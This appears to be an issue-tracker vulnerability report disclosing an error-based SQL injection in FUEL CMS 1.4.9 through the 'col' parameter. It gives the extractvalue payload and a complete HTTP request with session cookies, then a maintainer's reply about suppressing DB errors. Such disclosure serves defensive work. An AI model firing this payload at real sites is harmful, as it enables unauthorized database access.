Vulnerability - SQL Injection

[sie504]

Environment

Version: 1.4.9

Vulnerability

Parameter Name:col Parameter Type: GET Attack Pattern: extractvalue(1,concat(char(126),(select/**/current_user())))

Step

step 1 step 2

GET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=extractvalue(1,concat(char(126),(select/**/current_user())))&fuel_inline=0 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://127.0.0.1/fuel/pages
Cookie: ci_session=cfe42220d7540c849f2fdd72ddb732ff0e6addfb; fuel_74d00769f76d3dfc59096d1a4f6419d3=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A7%3A%22english%22%3B%7D; fuel_ui_74d00769f76d3dfc59096d1a4f6419d3=%257B%2522leftnav_h3%2522%253A%25220%257C0%257C0%257C0%2522%252C%2522fuel_pages_items%2522%253A%2522list%2522%257D

[L-ian9]

可以具体定位下出问题代码的位置吗？

[daylightstudio]

I've recently pushed an update to prevent DB SQL error messages from being displayed on production which should fix this issue on a production server.